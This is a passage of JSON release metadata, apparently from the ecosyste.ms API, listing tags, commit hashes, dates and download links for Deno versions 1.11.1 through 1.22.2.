02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at"